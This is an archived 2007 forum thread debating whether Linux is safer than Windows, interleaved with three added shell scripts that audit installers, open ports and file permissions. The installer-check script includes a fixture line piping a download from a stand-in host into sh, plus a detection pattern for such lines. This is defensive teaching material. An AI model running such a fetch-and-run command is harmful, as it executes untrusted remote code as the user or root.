Are Linux and its variants "Malware Proof"?

Discussion in 'other security issues & news' started by Mr. Y, Dec 31, 2007.

Thread Status:
Not open for further replies.
  1. sukarof

    sukarof Registered Member

    Joined:
    Jun 22, 2004
    Posts:
    1,887
    Location:
    Stockholm Sweden
    I don't know much about repositories, but I guess you mean that a user will never encounter malware when installing from the "repositories"?
    Yes, Linux is not as targeted as Windows is, but let us for the sake of argument say that the two OSes have the same threat picture.
    If I install a piece of software, let's say strip poker for Linux that I got by mail, that has a hidden trojan, I must use sudo to install it, right?
    When I use the sudo command, does the installer only have access to limited, unnecessary parts of Linux during the install? So even if it has malware it can not do anything bad to Linux when installing with sudo? Or does the software you're installing have root access if it is coded to use it?
    If it has full access to the Linux kernel or whatever, how does it differ, security-wise, from "runas" in Windows LUA?


    So, what you are saying really is that Linux is not much safer than Windows LUA when installing with sudo? It's all up to the common sense of the user, regardless of which OS you run?



    Are you talking about Windows LUA when you say drive-by scripts?

    I don't mean to insult any Linux users, I really want to know if there is a difference between sudo and "runas".

    I ran Gutsy Gibbon for a couple of months. I really liked the new interface, but got a bit discouraged since it was very slow on my machine (maybe it's just the Ubuntu distro that is slow?), compared to Vista with all the fancy stuff turned on, even when I did a clean install in a dedicated partition. And a couple of programs that I just like too much didn't have any replacements yet.
    I sure will try it again with new versions once they have optimised the code.
     
  2. Mrkvonic

    Mrkvonic Linux Systems Expert

    Joined:
    May 9, 2005
    Posts:
    10,229
    Hello,

    Single user - there's little difference. But that's the point. Windows is a single-user environment. Linux is a multi-user environment. That's where the power of root / sudo really comes to play.

    People always talk about desktop as an example. They forget servers that control huge networks with hundreds and thousands of computers. Imagine they were all admins - like in Windows.

    Or imagine they were all LUA - show me one company that works with Windows as LUA. I have worked and interacted with the following companies, and never seen one Windows PC that is not a full admin - General Electric, IBM, Toshiba, Philips, Marconi, Galileo, to name a few.

    Back to desktop:
    When you grant root permission to the user - most often yourself - you defeat the separation mechanism. Sometimes, this is necessary. But on a setup, working system, you don't need root. And setting up standard user account in Linux is a billion times easier and more effective / compatible than Windows LUA.

    And yes, Linux is safer than Windows LUA. That's because of the modularity.

    Windows GUI, IE etc. are built into the kernel. The Linux kernel is completely modular. You can strip it down to 5MB! GUI is optional. Shells are optional. Mail is optional. FTP is optional. And so forth.

    You can build a system like Lego and no part will make the house crumble. In Windows, a completely unrelated DLL bug in software X will cause a system-wide problem because some obscure program reads .wmf files when Paint is invoked through telnet... or something like that.

    But I'll say again - nothing defeats the user's determination to cause damage. Nothing. This must be taken into account when considering passive / active security.

    The chances for active damage are equal in both OSes... the chance for passive damage is much lower in Linux.

    Finally, malware. Where are you going to get it? The official repo? No different from downloading a Windows update and discovering it's been hacked. The same likelihood. If you go for download sites on the web, you have the source code and the hashes, reducing the chance of malware even further.

    Plus, Windows updates cover Windows / MS products only, no other apps. So you're less safe if you don't constantly update all your 76 applications. For example, Java, Flash plugin, Acrobat Reader, to name a few. In Linux distros, you get system-wide updates.

    As to Gutsy running slower - that's strange. Linux is usually significantly faster than any contemporary Windows on the same hardware, especially Vista. But you could have configured it very wrongly to make that happen.

    Mrk
     
  3. Paranoid2000

    Paranoid2000 Registered Member

    Joined:
    May 2, 2004
    Posts:
    2,839
    Location:
    North West, United Kingdom
    Unless the repositories are compromised, yes. They can be viewed as the Linux equivalent of Windows Update in that they normally deliver "trusted" code.
    First you would have to make the attachment executable using chmod. Then you would need to run it, and without sudo or admin access it would be very limited in what it could do to your system (unless it was able to exploit a privilege escalation vulnerability in other software or poorly set permissions on your system).
    Sudo gives the affected command root access, which means it can do anything - just like Administrator access in Windows.
    Sudo specifically offers root access; RunAs can be used with any other user account in Windows (though Admin is the most likely use). You obviously should exercise the same care with sudo and su that you would with RunAs on Windows systems.

    There are architectural differences that make Linux/Unix more secure than Windows (no equivalent of Windows' DLL injection for modifying other running processes, no possibility of a Shatter attack, no central Registry containing critical system settings) but the most important reasons are that applications are not integrated into the OS (like Internet Explorer is in Windows) which means that, as long as users take sensible configuration decisions (not running unsecured servers, not using weak account passwords), they won't be compromised without some action on their part (like installing a trojan manually).

    Windows by default requires more work to secure (though XP SP2 improved greatly on this, it still requires some work) and it does require the use of third-party software (though much of this is available free). With Linux, there is far less in the way of third-party security tools, so you could argue that a properly secured Windows system (with process protection/execution control, a top-end firewall, a registry monitor) can be more secure, assuming the user knows how to use their security tools.
     
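sukarof asks above whether a trojaned installer is constrained once it is run through sudo, Mrkvonic points to the hashes that accompany web downloads, and Paranoid2000 notes that a saved attachment is not even executable until you chmod it. The script below is an added example, not code from any poster in this thread: it runs the checks a practitioner would do on such a file before handing it to sudo. The "published" hash, the installer text and the grep pattern list are constructed for the illustration.

```shell
#!/bin/sh
# Added example for this thread (not code from any poster): the checks to run
# on a downloaded installer *before* typing "sudo ./install.sh". Once sudo
# runs it, the script is root and nothing below constrains it any more.
# Assumptions: a POSIX shell, sha256sum or shasum, mktemp; the installer and
# the "published" hash below are constructed fixtures.

# SHA-256 of a file, using whichever tool is present.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# 0 if the file matches the hash the distributor published, 1 otherwise.
# Only meaningful when the hash arrived over a different channel than the
# file; a hash in the same mail as the attachment proves nothing.
verify_download() {
    [ "$(sha256_of "$1")" = "$2" ]
}

# 0 if any execute bit is set (x, or s/t which imply x). Saved attachments
# normally have none, which is the chmod step Paranoid2000 mentions. Reading
# the mode string avoids the special-casing test -x applies when run as root.
is_executable() {
    ls -ld "$1" | cut -c2-10 | grep -q '[xst]'
}

# Number of lines in a shell installer that ask for root or pipe downloaded
# content into a shell. Heuristic with my own pattern list: a non-zero count
# means "read those lines", not "this is malware".
privileged_lines() {
    grep -Ec 'sudo |su -|curl .*\| *(ba)?sh|wget .*\| *(ba)?sh' "$1" || true
}

# Constructed fixtures: a stand-in for the archive, with a known hash, and an
# installer that copies a binary into the system path.
make_fixtures() {
    dir=$(mktemp -d)
    printf 'hello\n' > "$dir/poker.tar.gz"
    cat > "$dir/install.sh" <<'EOF'
#!/bin/sh
tar xzf poker.tar.gz
sudo cp poker /usr/local/bin/poker
sudo cp poker.service /etc/systemd/system/
curl -s http://example.invalid/extra | sh
EOF
    chmod 644 "$dir/install.sh"
    echo "$dir"
}

main() {
    dir=$(make_fixtures)
    # Hash of the constructed archive, standing in for the value on the vendor's site.
    published=5891b5b522d5df086d0ff0b110fbd9d21bb4fc7163af34d08286a2e846f6be03
    if verify_download "$dir/poker.tar.gz" "$published"; then
        echo "archive matches published SHA-256"
    else
        echo "HASH MISMATCH: do not install"
    fi
    if is_executable "$dir/install.sh"; then
        echo "installer is already executable"
    else
        echo "installer is not executable; it cannot run until you chmod +x it"
    fi
    echo "lines that request root or fetch-and-run code: $(privileged_lines "$dir/install.sh")"
    rm -rf "$dir"
}

main "$@"
```

The point of the ordering is the one Paranoid2000 makes: the only place judgement can be applied is before sudo. After that, the installer runs as root with the same reach as the Windows Administrator the thread compares it to, and the hash check, the mode check and the read-through are all moot.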
  4. Pedro

    Pedro Registered Member

    Joined:
    Nov 2, 2006
    Posts:
    3,502
    Sukarof, as with any OS, as soon as you give a process full control (admin - root privilege) that's pretty much it.

    But a compromised browser, IM, etc. does not mean a compromised OS, that I have learned. That's what Mrk means by modularity.
    The OS was built like that from the start, everything is not dependent on anything. Windows was built the other way: they added LUA on a permissive OS.

    Solcroft, your attitude is pretty amazing..
    1- You admit you do NOT know GNU/Linux - proven here for sure, you really don't have a clue.
    2- You started using LUA yesterday
    3- these posts

    I have plenty of links to provide, but not to you, and not here. You have the worst possible attitude. You want information? GOOGLE IT. But I think you're NOT looking for information.

    Now i know why the other guy said he doesn't care about these discussions.
     
  5. sukarof

    sukarof Registered Member

    Joined:
    Jun 22, 2004
    Posts:
    1,887
    Location:
    Stockholm Sweden
    Thanks all for your explanations. I understand a bit more now.

    Yeah, I was a bit surprised too. I did let Ubuntu update all that it wanted. I probably did something wrong, because I do realize that Windows is a bit bloated compared to Linux. I figured that since Vista runs really fast on my machine, the speed of Ubuntu would blow me off my chair :) I didn't have any problems with the Beryl interface, it ran very smoothly and fast with the cube and wobbly windows (just love them :) ). It was the program starts and the boot process that took a surprisingly long time imo when comparing to Windows. Maybe the boot process was slow because I had to use LILO since GRUB just wouldn't start Ubuntu at all.
    But next time I install it I will read even more how-tos.
     
    Last edited: Jan 2, 2008
  6. Mr. Y

    Mr. Y Registered Member

    Joined:
    Jan 11, 2006
    Posts:
    257
    I installed Ubuntu 7.10 (Gutsy Gibbon) on one of my hard drives and I can see that I have a whole new learning curve to experience (I don't mind).

    I found the XP LUA to be too restrictive and ended up running under Admin all the time- I'll retry suDown.
     
  7. Mr. Y

    Mr. Y Registered Member

    Joined:
    Jan 11, 2006
    Posts:
    257
    I realize this is off the topic but.....

    Will standard Linux drivers such as the ATI drivers downloaded from the ATI website work on this Linux variant (Ubuntu 7.10)?
     
  8. zapjb

    zapjb Registered Member

    Joined:
    Nov 15, 2005
    Posts:
    5,559
    Location:
    USA still the best. But barely.
    I suggest those having unacceptable issues with Ubuntu try the PCLOS LiveCD. Link in sig.
     
  9. Cerxes

    Cerxes Registered Member

    Joined:
    Sep 6, 2005
    Posts:
    581
    Location:
    Northern Europe
    @Paranoid2000: Well written posts as always Paranoid. I enjoy reading them and it clearly shows the difference between experts and us happy users regarding how to explain in a straightforward way :)

    /C.
     
  10. Kerodo

    Kerodo Registered Member

    Joined:
    Oct 5, 2004
    Posts:
    8,013
    Don't be surprised if you see some apps loading slowly... I have found that it varies wildly from distro to distro. I've seen Firefox load as fast as 1 second and as slow as about 5 or 6 seconds... I doubt you've misconfigured anything, it could just be that your PC doesn't like Ubuntu. Ubuntu runs well for me, one of the better ones though, but your PC is your PC. I'd try several of the major distros to get a better feel for things. My overall impression after trying out over a dozen distros is that Linux and Win are about the same speedwise.. I don't see one beating the other really... Win2k is faster for me than XP. And I've seen some snappy and some sluggish Linux distros too. Same applies to boot times also...

    So I guess the moral of the story is: Try many till you find a good one.. :)
     
  11. solcroft

    solcroft Registered Member

    Joined:
    Jun 1, 2006
    Posts:
    1,639
    This would mean that no process has any authority to compromise the integrity of any other process. Why does this sound like Windows LUA to me?

    So it seems that your argument is that Windows is less secure, because you have to waste 60 seconds of your time to setup an LUA in Windows.

    Any idiot could've guessed, and just in case you still think you're making some sort of groundbreaking observation, I admitted as much freely and explicitly.

    I can probably waste 60 seconds explaining to you why making this assumption is both stupid and wrong, but I'll just give you the short answer and say, "no, I didn't."

    If you say so.

    The only strange thing is that, until now, there hasn't been a single shred of credible evidence that Linux is safer than Windows in this thread. There have been allegations, and there have been explanations why Linux is safe, but there has been no credible evidence why Linux is safer than Windows.

    Linux is modular. In Windows you can disable unneeded services, and you have SRP and NTFS access permissions. Linux has software repositories aka trusted software sources, so does Windows. Linux is safe, yada yada. But so what, and how do these factor into the equation? The critical question has not been answered, and continues to be dodged. And if you like to pretend you're withholding some critical, groundbreaking information, then so be it.

    What a coincidence, so do I.
     
  12. Pedro

    Pedro Registered Member

    Joined:
    Nov 2, 2006
    Posts:
    3,502
    You should have figured out by now that this principle isn't OS specific..
    But what I really meant was that there isn't an Internet Explorer up its arse ;)
    It seems you didn't understand.
    You see, "any idiot"? Calm down. Notice "You admit".
    No, I'm not stupid, I know what I'm saying.
    Disabling services, while reducing risks, doesn't have anything to do with what we're talking about.
    And if you keep looking for evidence of Win vs Linux in here, that means you are not looking for info.
    This discussion revolves around "Are Linux and its variants "Malware Proof"?", to which the answer is the same for any OS: no. If you're an admin on your own computer, you ultimately install what you want.

    Solcroft this is the last reply. What you didn't understand is your own fault.
     
  13. solcroft

    solcroft Registered Member

    Joined:
    Jun 1, 2006
    Posts:
    1,639
    Exactly. The ability to strip administrative rights from the user and prevent them from accessing critical system resources isn't specific to Linux, it's available to Windows as well. People claim all the time that reduced privileges means Linux is safer; how can it be safer based on this feature, when Windows has the same as well? At best one can conclude that they're equally safe, simple as that.

    This is a very common misconception. IE is not a part of Windows.

    In very basic and largely inaccurate terms, what typically happens when the stereotypical IE security flaw gets exploited is that a trojan horse is downloaded and executed without the user's knowledge, or the user is subversively redirected to a malicious website they didn't intend to visit. The second type of attack has nothing to do with whether the OS is secure, it's the browser. Firefox has had its share of security flaws as well in this regard. The first type of attack, again, has nothing to do with the OS. If the OS is properly hardened, any malware that executes this way will find itself in a very unfriendly environment for propagation and/or causing damage.

    To reiterate, in this case, it has nothing to do with the OS, it's the browser. The browser comes bundled with the OS, just like the text editor, media player and disk defragmenter did, but it's not part of the OS – circumcise it from Windows, and you'll find that your computer continues working like nothing happened. And even then, IE7 is quite secure when fully updated, and not necessarily more vulnerable than Firefox, Opera, Safari or whatnot.

    Yes, I admit. I have no problems doing that. I'm waiting to see credible evidence to prove a claim that Linux supporters seem to believe is a fundamental truth. I've yet to see any such evidence.

    No, you don't. You have no idea of the duration of time I've been using Windows LUA for, and I'm perfectly comfortable with holding to my opinion that you're stupid for claiming I've only started using it yesterday, and then proceeding to state that you know what you're saying. The fact that you don't know how long I've used LUA for is an extremely simple one, and if you don't understand that, it's your own fault.

    If that doesn't, then neither do any of the discussion regarding Linux's modularity, software repositories, yada yada.

    The Linux supporters are expounding on Linux's security. And I'm giving a few examples on how Windows can provide an equal, if not superior, amount of security. If they're willing to actually discuss the actual question of why Linux is safer than Windows, then I'll do the same. In fact, it's what I hope will happen. But unfortunately they sidestep the question and choose to discuss Linux' security features without addressing the actual question, perhaps in the hope that newbies and the inexperienced will have the wool properly fleeced over their eyes. And when I try to set the record straight that Windows has its own methods of security as well, I am accused of talking about something irrelevant. That's a very biased accusation.

    The Linux supporters are here, out to defend what seems to them a fundamental truth of the universe. And unfortunately this is all they have to offer, along with the empty ultimatum that their inability to back up their claims means I should look elsewhere to prove myself wrong.

    The same to you, my good sir.
     
  14. Mr. Y

    Mr. Y Registered Member

    Joined:
    Jan 11, 2006
    Posts:
    257
    Many Linux forums suggest that the home Linux user does not need a firewall. Is this true?

    Just wondering why are there so many Linux variants?
     
  15. Kerodo

    Kerodo Registered Member

    Joined:
    Oct 5, 2004
    Posts:
    8,013
    I don't really know if that's totally true, but the easiest way to handle the whole issue is to just use a cheap NAT router in front of the machine and then you never have to worry about it anymore... Win or Linux...
     
  16. steve161

    steve161 Registered Member

    Joined:
    Nov 22, 2006
    Posts:
    681
    Location:
    New York
    Supposedly, Ubuntu by default has all ports closed. Since I am behind a router/fw, I have never had the need to check this.
     
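steve161's remark that Ubuntu ships with all ports closed is something you can verify rather than take on trust. The script below is an added example, not code from anyone in the thread: it parses `ss -ltn` output and keeps only the TCP listeners bound to a non-loopback address, which are exactly the sockets a NAT router of the kind Kerodo suggests would be shielding. The sample `ss` output is constructed, not captured from a real host.

```shell
#!/bin/sh
# Added example for this thread (not code from any poster): list listening
# TCP sockets that are reachable from other hosts, i.e. bound to something
# other than loopback. Parses `ss -ltn` output; the sample below is constructed.

# Read `ss -ltn` output on stdin, print one "addr port" line per exposed listener.
exposed_listeners() {
    awk '
        $1 == "LISTEN" {
            n = split($4, parts, ":")
            port = parts[n]
            addr = substr($4, 1, length($4) - length(port) - 1)
            # Loopback-only listeners are not reachable from other hosts.
            if (addr ~ /^127\./ || addr == "[::1]" || addr == "::1") next
            print addr, port
        }'
}

# Just the exposed port numbers, one per line, numerically sorted.
exposed_ports() {
    exposed_listeners | awk '{print $2}' | sort -n
}

# Constructed sample: CUPS on loopback only (v4 and v6), sshd on all
# interfaces, mDNS on all interfaces, a database bound to the LAN address.
SAMPLE_SS='State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port
LISTEN  0       128     127.0.0.1:631        0.0.0.0:*
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*
LISTEN  0       128     [::1]:631            [::]:*
LISTEN  0       128     *:5353               *:*
LISTEN  0       50      192.168.1.10:3306    0.0.0.0:*'

# Number of exposed listeners in the sample, for the offline demonstration.
sample_exposed_count() {
    printf '%s\n' "$SAMPLE_SS" | exposed_listeners | wc -l | tr -d ' '
}

# Run against the live system when ss exists; otherwise show the sample.
main() {
    if command -v ss >/dev/null 2>&1; then
        echo "listeners reachable from the network on this host:"
        ss -ltn | exposed_listeners
    else
        echo "ss not found; constructed sample gives:"
        printf '%s\n' "$SAMPLE_SS" | exposed_listeners
    fi
}

main "$@"
```

On a desktop install with nothing listening, the live run prints nothing, which is the "all ports closed" state; anything it does print is a service that a router's NAT, or a host firewall, is the only thing standing in front of.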
  17. Diver

    Diver Registered Member

    Joined:
    Feb 6, 2005
    Posts:
    1,444
    Location:
    Deep Underwater
    Someone around here is pulling everyones chain and he is rather crafty about it.
     
  18. lu_chin

    lu_chin Registered Member

    Joined:
    Oct 27, 2005
    Posts:
    295
    I have recently started to use Linux at work and I also think that with the default settings it is safer than Windows. On the other hand, any knowledgeable user can go to lengths/the extreme to harden things oneself, but that is not what most users do (or know how to do). For example

    - with a new XP PC and a new Linux PC it will be easier for someone to delete system files inside the GUI (e.g. Windows Explorer vs. Konqueror).

    - IE is the default web browser in Windows and more websites target it out there. I have already heard that argument about IE being the most popular web browser and thus targeted more and so on. But if a user is a novice, he/she probably will find it a bit difficult to "uninstall" IE from Windows. Thus the average user will be more "exposed" to threats on the web when using Windows.

    - Linux patches get out more frequently than in Windows (normally once a month). Open source software (including the Linux kernel) tends to be reviewed by more people in public.
     
  19. zapjb

    zapjb Registered Member

    Joined:
    Nov 15, 2005
    Posts:
    5,559
    Location:
    USA still the best. But barely.
    Really think so? I think it's a ringer or prop situation myself.
     
  20. Dogbiscuit

    Dogbiscuit Guest

    :thumb:
     
  21. solcroft

    solcroft Registered Member

    Joined:
    Jun 1, 2006
    Posts:
    1,639
    By default, important system files are marked as hidden, and will not show up in Windows Explorer. Furthermore, really critical system files are hidden by another setting that must be turned on independently. If some of these files are deleted or modified, winlogon.exe steps in with an alert that these files have been modified and prompts you to insert your Windows installation CD to replace the files with a good copy. Under LUA, you have absolutely no permissions to modify those files in any way.

    Again, by default, system files are marked as hidden and invisible to the user. I don't know how it can be "easier" to delete them than in Linux under default settings, when it's impossible to do so without changing the default settings.

    The fact that IE is 'integrated' into the OS has no impact on its security. A leaky, poorly-coded browser is a leaky browser whether it's 'separated' from the OS or otherwise.
    http://blogs.msdn.com/dmassy/archive/2005/03/22/400689.aspx

    Another popular myth. Just because many people can review the code doesn't necessarily mean it's safer, because not everyone reviewing the code is one of the good guys.

    That advice holds for Linux as well. Simple fact: most modern applications include update notification and/or automatic update features – including Java, Flash and Acrobat Reader, to name a few. Since it seems that Linux is just as likely to be as vulnerable without updates, no, I cannot see how this shows Linux is more secure.

    These actions are also blocked by a Windows LUA. The specific APIs for DLL injection, memory access, driver loading etc. are blocked. A process running in LUA has zero chance of gaining ring0 privileges or accessing the OS kernel unless you use "Run as" with an admin account on it. A limited user has no write access to the Program Files/Windows/other users' settings folders, nor to the HDD boot sector. System-wide settings are blocked from being modified. The user is only allowed to write into his/her own HKU hive in the registry, and blocked from the HKLM hive. As far as I can see, these restrictions are pretty similar to what you describe, and I cannot see how Linux's architectural differences make it more secure – equally secure, maybe, but not more.

    Requires more work to secure: Fresh out of the box, the only truly vulnerable component of a copy of unupdated Windows is IE6. By default, the built-in firewall will deny remote access to all services except Remote Assistance, unless you explicitly allow access to other services. By far the quickest way of securing a fresh copy of Windows XP is to set up an LUA, and install either a sandboxing program (to sandbox IE6) or a third-party browser – that's all you actually need to remain malware-free. I highly doubt this is "much more work" than needs to be done on Linux; even if Linux came secure right out of the box, I wouldn't call installing either Sandboxie or Opera "much more work". Of course there is much more you can do with Windows if you want to take additional precautions (group policies, NTFS access permissions, other third-party security software, which are strictly optional), but what I've described is the minimum requirement to reliably remain malware-free.

    Does require the use of third-party software: Not really. XP includes its own firewall, process execution control and access restrictions. If something really does go snafu, delete your limited user account and create a new one. Third-party software is the most popular method to secure Windows, but far from a necessity.
     
  22. lu_chin

    lu_chin Registered Member

    Joined:
    Oct 27, 2005
    Posts:
    295
    As far as I know, LUA is not the default on Windows XP, 2000, NT, ME, 9x. If I am a GUI user, I can quite easily highlight the wrong file (even folder) and delete it (and I have done this more than once in the past). In Linux, by default you cannot delete files in, say, /, etc. This is especially problematic when you can delete files/folders from C:\ (and downward, e.g. C:\Program Files, autoexec.bat).

    By default IE is the browser in Windows and if it is already targeted (and exploited more) by web pages, then will it be a bigger risk to Windows users than Linux users in general? Linux does not have IE and folks also acknowledge that both Linux and non-IE browsers are targeted less by hackers (due to the so called less popularity). Does this already imply that default web browsing is safer in Linux than in Windows? Or maybe now people can theorize that non IE browsers such as Firefox in Linux is less secure than IE and thus the above does not matter.

    Personally, I think more people examining source code is not a bad thing. Would MS regret not having more folks review the code that led to the infamous .WMF exploit? Why would MS have a so-called "security initiative" and review Windows supposedly from top to bottom since then (with more "eyes")? Just like folks can comment on different opinions/ideas here despite their intentions, because people can make up their own minds afterwards. People can decide what to accept/reject, and so do code maintainers that receive feedback from others. Also, will it help well-known security analysts to have an easier time if the source code is publicly available? You can certainly say that bad guys can access the same source code, but I tend to believe there are more good folks out there. So the advantage outweighs the risk.

    As I said before, there can be many things done by users in Windows to do this and that, but that is "not by default" in so many versions/flavors of Windows (except Vista). By default means no adding of security programs and tweaking. I already learned from here the myriad security programs available at my fingertips, but they will not likely be what the average Joe or Jane will be spending their time on. Who is going to set up an LUA for grandma or grandpa after they get a new Windows PC for Christmas?

    Cheers.

     
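lu_chin's point that a standard Linux user cannot delete files under / by default rests on the mode bits of the system directories, and Paranoid2000 flagged the exception earlier: poorly set permissions. The script below is an added example, not code from any poster: it audits a directory tree for entries that "others" can write to, skipping sticky directories like /tmp where that is intended. The tree it audits is constructed, with one deliberately bad third-party install in it.

```shell
#!/bin/sh
# Added example for this thread (not any poster's code): audit a directory
# tree for files and directories that "others" can write to, i.e. the
# "poorly set permissions" that let a standard user change or delete things
# outside their home. Root bypasses these bits entirely, so the audit is about
# what a non-root user (or a trojan running as one) could reach.
# Assumptions: POSIX sh, ls, find, mktemp; the tree below is constructed.

# Symbolic mode string such as "drwxr-xr-x" (portable across GNU and BSD ls).
mode_of() {
    ls -ld "$1" | cut -c1-10
}

# 0 if the "others" write bit (position 9 of the mode string) is set.
world_writable_mode() {
    case $1 in
        ????????w?) return 0 ;;
        *)          return 1 ;;
    esac
}

# World-writable files and directories under a tree, excluding sticky
# directories like /tmp, where a user can only remove their own entries.
world_writable_in() {
    find "$1" \( -type f -o -type d \) -perm -002 ! -perm -1000 | sort
}

# Constructed tree imitating a small system: correct defaults plus one
# third-party install that was unpacked with chmod 777 "to make it work".
make_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/etc" "$root/usr/bin" "$root/tmp" "$root/opt/thirdparty"
    : > "$root/etc/passwd";             chmod 644 "$root/etc/passwd"
    : > "$root/usr/bin/poker";          chmod 755 "$root/usr/bin/poker"
    : > "$root/opt/thirdparty/run.sh";  chmod 777 "$root/opt/thirdparty/run.sh"
    chmod 755 "$root/etc" "$root/usr" "$root/usr/bin" "$root/opt"
    chmod 777 "$root/opt/thirdparty"    # anyone can replace run.sh or drop files here
    chmod 1777 "$root/tmp"              # world-writable but sticky, as on a real system
    echo "$root"
}

main() {
    root=$(make_tree)
    for p in etc/passwd usr/bin/poker opt/thirdparty tmp; do
        m=$(mode_of "$root/$p")
        if world_writable_mode "$m"; then flag="world-writable"; else flag="ok"; fi
        printf '%s  %-18s %s\n' "$m" "$p" "$flag"
    done
    echo "findings (sticky directories excluded):"
    world_writable_in "$root" | sed "s|^$root/||"
    rm -rf "$root"
}

main "$@"
```

Run `world_writable_in /usr` or `/etc` on a real install and the expected result is no output; a hit there means a non-root process, including anything a user was tricked into running, can replace a file that every user and possibly root will later execute or read.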
  23. Cerxes

    Cerxes Registered Member

    Joined:
    Sep 6, 2005
    Posts:
    581
    Location:
    Northern Europe
    No need to, since it's pre-installed with Vista using UAC, so they are already restricted users.

    /C.
     
  24. Riverrun

    Riverrun Registered Member

    Joined:
    Feb 19, 2007
    Posts:
    376
    Location:
    ~
    All I can say is that I've been using Linux almost constantly since the middle of August. I have no real-time AV, no anti-spyware of any sort, no HIPS, no sandbox, no firewall for most of the time, nothing like PS or Returnil, and GNU/Linux is running like a champ. I know that I wouldn't venture out onto the web for five minutes in a Windows box that was so attired; to do so would be madness and would bring ruin in a matter of moments.

    If this isn't a testimony to the inherent strength of Linux, I don't know what else is.

    Cheers all.
     
  25. solcroft

    solcroft Registered Member

    Joined:
    Jun 1, 2006
    Posts:
    1,639
    You're right; it isn't. However, autoexec.bat is hidden by default, meaning it's quite impossible for you to click on it "by accident". If you tried to delete the Program Files folder, Windows pops up a dialog telling you "renaming, moving or deleting this folder could make some programs not work". It will also prompt you for every hidden, system and read-only file in that folder. And, after all that trouble, you can recover it from the Recycle Bin if you want to.

    I'm sure that everyone accidentally deletes important files in C:\ on an often enough basis for this issue to actually matter in the wider scheme of things (a.k.a. outside the scope of nitpicking for the sake of nitpicking). And all this trouble is when you already have administrator access rights. More difficult than "accidentally" elevating your privileges and zapping those files in Linux? You tell me.

    No, what I'm saying is that browser security and OS security have nothing to do with each other. The browser can be vulnerable (if left unpatched), and the OS can remain secure regardless. Vulnerabilities in IE6 do not compromise the OS if the OS itself is properly secured, contrary to popular belief. This is not a discussion of old, unpatched IE6 vs the newest, latest version of Firefox, this is a discussion of whether Linux or Windows is more secure.

    There's a major difference. Microsoft's code would be reviewed by trusted white hats who do so for the sake of improving the software's security. Linux's would be reviewed by anyone who wants to, who doesn't necessarily have the end users' best interests at heart.

    Also, just so you know, the wmf exploit was blocked right on day zero by DEP; yes, even with administrator privileges enabled. With LUA, the exploit is effectively worthless, since its purpose was to download and execute arbitrary malicious code that wouldn't have done much in LUA.

    That's more of an emotional statement based on your personal bias than a proven, factual one.

    You seem extraordinarily determined to keep the debate to the states of Windows and Linux when they're fresh out of the box, default state, and unmodified, where Windows is old and unpatched and where Linux is up-to-date with the latest updates. I suspect this is because you sorely need these conditions to be in place in order for you to have anything to talk negatively about Windows. If you are willing to spend 60 seconds to create a Limited User Account in Windows, you'll find that all your arguments just become null and void.

    Everyone, if they're smart. It's quick, painless, and effective. I fully recommend everyone do it, and introduce this excellent defense mechanism as a very user-friendly solution for less-experienced users.

    My own experiences with it have been positive. My parents and sister use it (though they don't know it), and even though they swap removable media all the time at their grossly-infected school/uni networks, they've remained clean for the better part of a year, as verified by Kaspersky's and Eset's online scanners (10 months, to be exact). Another recent experience I've had was a friend asking me to help secure his PC for him, because he was leaving for Sydney for his internship and will have to share his PC with others. He's been there for two months, and it's good news so far.

    You seem to believe it's some zealously overcomplicated concept, and your inexperience with it shows.
     